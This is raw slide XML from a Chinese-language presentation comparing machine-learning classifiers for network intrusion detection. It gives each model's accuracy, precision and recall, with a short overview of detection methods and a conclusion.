              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>召回率：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>89.34%</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="文本框 10"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId9"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8174990" y="4457700"/>
            <a:ext cx="2776220" cy="922020"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>准确率：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>99.55%</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>精确率：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>85.02%</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>召回率：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>89.34%</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2224405"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决策树</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3200" b="1" dirty="0">
                <a:latin typeface="楷体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
                <a:ea typeface="楷体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>模型</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="3200" b="1" dirty="0">
              <a:latin typeface="楷体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
              <a:ea typeface="楷体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="10" name="图片 9"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId2"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5359400" y="1365250"/>
            <a:ext cx="5897880" cy="4944745"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="13" name="图片 12"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId4"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1165860" y="1946910"/>
            <a:ext cx="4178300" cy="335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798195" cy="583565"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" b="1" dirty="0">
                <a:latin typeface="楷体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
                <a:ea typeface="楷体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>KNN</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="3200" b="1" dirty="0">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2"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1165860" y="2952750"/>
            <a:ext cx="4038600" cy="331470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1165860" y="1365250"/>
            <a:ext cx="6845300" cy="1587500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="矩形 6"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId6"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5641981" y="3428882"/>
            <a:ext cx="1407795" cy="1568450"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3200" b="1" dirty="0">
                <a:latin typeface="楷体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
                <a:ea typeface="楷体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>贝叶斯</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="3200" b="1" dirty="0">
              <a:latin typeface="楷体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
              <a:ea typeface="楷体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" b="1" dirty="0">
                <a:latin typeface="楷体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
                <a:ea typeface="楷体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>SVM</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="3200" b="1" dirty="0">
              <a:latin typeface="楷体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
              <a:ea typeface="楷体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"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失败</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="3200" b="1" dirty="0">
              <a:latin typeface="楷体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
              <a:ea typeface="楷体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="图片 7"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId7"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId8"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7487285" y="3027045"/>
            <a:ext cx="3670300" cy="3289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1816100"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随机</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3200" b="1" dirty="0">
                <a:latin typeface="楷体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
                <a:ea typeface="楷体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>森林</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="3200" b="1" dirty="0">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2"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1011555" y="1365250"/>
            <a:ext cx="6985000" cy="158750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1542415" y="2952750"/>
            <a:ext cx="3670300" cy="330200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6174740" y="1365885"/>
            <a:ext cx="5165090" cy="472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1823720" cy="583565"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" b="1" dirty="0">
                <a:latin typeface="楷体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
                <a:ea typeface="楷体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>eG </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" b="1" dirty="0">
                <a:latin typeface="楷体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
                <a:ea typeface="楷体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>boost</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="3200" b="1" dirty="0">
              <a:latin typeface="楷体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
              <a:ea typeface="楷体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="矩形 23"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1165860" y="1569720"/>
            <a:ext cx="9342755" cy="1476375"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1" dirty="0">
                <a:latin typeface="宋体" charset="0"/>
                <a:ea typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>Accuracy: 0.9971500130</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000" b="1" dirty="0">
              <a:latin typeface="宋体" charset="0"/>
              <a:ea typeface="宋体" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1" dirty="0">
                <a:latin typeface="宋体" charset="0"/>
                <a:ea typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>Precision: 0.9361702128</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000" b="1" dirty="0">
              <a:latin typeface="宋体" charset="0"/>
              <a:ea typeface="宋体" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1" dirty="0">
                <a:latin typeface="宋体" charset="0"/>
                <a:ea typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>Recall: 0.8934010152</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000" b="1" dirty="0">
              <a:latin typeface="宋体" charset="0"/>
              <a:ea typeface="宋体" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2" name="图片 1"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId2"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4759325" y="1569720"/>
            <a:ext cx="4381500" cy="345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2632710"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模型泛化</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3200" b="1" dirty="0">
                <a:latin typeface="楷体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
                <a:ea typeface="楷体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>能力</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="3200" b="1" dirty="0">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2"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="878840" y="1365250"/>
            <a:ext cx="10744200" cy="4851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3449320"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网络威胁检测</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3200" b="1" dirty="0">
                <a:latin typeface="楷体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
                <a:ea typeface="楷体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>概述</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="3200" b="1" dirty="0">
              <a:latin typeface="楷体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
              <a:ea typeface="楷体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="矩形 23"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1165860" y="1569720"/>
            <a:ext cx="9342755" cy="3784600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1" dirty="0">
                <a:latin typeface="宋体" charset="0"/>
                <a:ea typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>网络威胁（网络入侵）是一系列旨在破坏计算平台上资源的完整性、机密性或可用性的行为。网络威胁检测系统（IDS）用于监控网络流量以寻找可疑流量并在发现此类流量的时候发出警报，并在检测到异常的时候采取行动，比如阻止来自可疑的 IP 地址的流量等等。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000" b="1" dirty="0">
              <a:latin typeface="宋体" charset="0"/>
              <a:ea typeface="宋体" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000" b="1" dirty="0">
              <a:latin typeface="宋体" charset="0"/>
              <a:ea typeface="宋体" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1" dirty="0">
                <a:latin typeface="宋体" charset="0"/>
                <a:ea typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>检测</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1" dirty="0">
                <a:latin typeface="宋体" charset="0"/>
                <a:ea typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>技术：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000" b="1" dirty="0">
              <a:latin typeface="宋体" charset="0"/>
              <a:ea typeface="宋体" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="1" dirty="0">
                <a:latin typeface="宋体" charset="0"/>
                <a:ea typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>1. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1" dirty="0">
                <a:latin typeface="宋体" charset="0"/>
                <a:ea typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>异常</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1" dirty="0">
                <a:latin typeface="宋体" charset="0"/>
                <a:ea typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>检测；</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000" b="1" dirty="0">
              <a:latin typeface="宋体" charset="0"/>
              <a:ea typeface="宋体" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="1" dirty="0">
                <a:latin typeface="宋体" charset="0"/>
                <a:ea typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>2. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1" dirty="0">
                <a:latin typeface="宋体" charset="0"/>
                <a:ea typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>特征</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1" dirty="0">
                <a:latin typeface="宋体" charset="0"/>
                <a:ea typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>检测。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000" b="1" dirty="0">
              <a:latin typeface="宋体"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999490"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总结</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="3200" b="1" dirty="0">
              <a:latin typeface="楷体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
              <a:ea typeface="楷体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="矩形 23"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId2"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1049020" y="1765300"/>
            <a:ext cx="9342755" cy="2399665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:latin typeface="宋体" charset="0"/>
                <a:ea typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1" dirty="0">
                <a:latin typeface="宋体" charset="0"/>
                <a:ea typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>，决策树和</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="1" dirty="0">
                <a:latin typeface="宋体" charset="0"/>
                <a:ea typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t> egboost </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1" dirty="0">
                <a:latin typeface="宋体" charset="0"/>
                <a:ea typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>算法的效果</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1" dirty="0">
                <a:latin typeface="宋体" charset="0"/>
                <a:ea typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>最好；</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000" b="1" dirty="0">
              <a:latin typeface="宋体" charset="0"/>
              <a:ea typeface="宋体" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000" b="1" dirty="0">
              <a:latin typeface="宋体" charset="0"/>
              <a:ea typeface="宋体" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="1" dirty="0">
                <a:latin typeface="宋体" charset="0"/>
                <a:ea typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1" dirty="0">
                <a:latin typeface="宋体" charset="0"/>
                <a:ea typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>，选择好的特征</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1" dirty="0">
                <a:latin typeface="宋体" charset="0"/>
                <a:ea typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>至关重要；</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000" b="1" dirty="0">
              <a:latin typeface="宋体" charset="0"/>
              <a:ea typeface="宋体" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000" b="1" dirty="0">
              <a:latin typeface="宋体" charset="0"/>
              <a:ea typeface="宋体" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="1" dirty="0">
                <a:latin typeface="宋体" charset="0"/>
                <a:ea typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1" dirty="0">
                <a:latin typeface="宋体" charset="0"/>
                <a:ea typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>，需要进一步扩大数据</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1" dirty="0">
                <a:latin typeface="宋体" charset="0"/>
                <a:ea typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>规模。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000" b="1" dirty="0">
              <a:latin typeface="宋体"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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="6" name="组合 5"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1252694" y="1641692"/>
            <a:ext cx="9686611" cy="5016934"/>
            <a:chOff x="1496680" y="1476374"/>
            <a:chExt cx="7266319" cy="4386807"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="7" name="矩形 6"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1571625" y="1476374"/>
              <a:ext cx="7086600" cy="3248025"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="E8F5F8"/>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Arial" panose="020B0604020202090204"/>
                <a:ea typeface="微软雅黑"/>
                <a:sym typeface="Arial" panose="020B0604020202090204"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="8"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4560449" y="1660630"/>
              <a:ext cx="1138782" cy="7266319"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="文本框 8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2293154" y="2410110"/>
            <a:ext cx="7565925" cy="1476375"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="6000" dirty="0">
                <a:latin typeface="报隶-简" panose="02010600040101010101" charset="-122"/>
                <a:ea typeface="报隶-简" panose="02010600040101010101" charset="-122"/>
              </a:rPr>
              <a:t>Thanks for listening</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="6000" dirty="0">
                <a:latin typeface="汉仪尚巍手书W" panose="00020600040101010101" pitchFamily="18" charset="-122"/>
                <a:ea typeface="汉仪尚巍手书W" panose="00020600040101010101" pitchFamily="18" charset="-122"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="6000" dirty="0">
              <a:latin typeface="汉仪尚巍手书W" panose="00020600040101010101" pitchFamily="18" charset="-122"/>
              <a:ea typeface="汉仪尚巍手书W" panose="00020600040101010101" pitchFamily="18" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="矩形 23"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3113836" y="3740348"/>
            <a:ext cx="5964321" cy="460375"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPct val="200000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1200"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iterate type="wd">
                                    <p:tmPct val="10000"/>
                                  </p:iterate>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750"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="9"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="13" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="2750"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="14" presetID="16" presetClass="entr" presetSubtype="21"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3449320"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网络威胁检测</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3200" b="1" dirty="0">
                <a:latin typeface="楷体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
                <a:ea typeface="楷体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>过程</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="3200" b="1" dirty="0">
              <a:latin typeface="楷体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
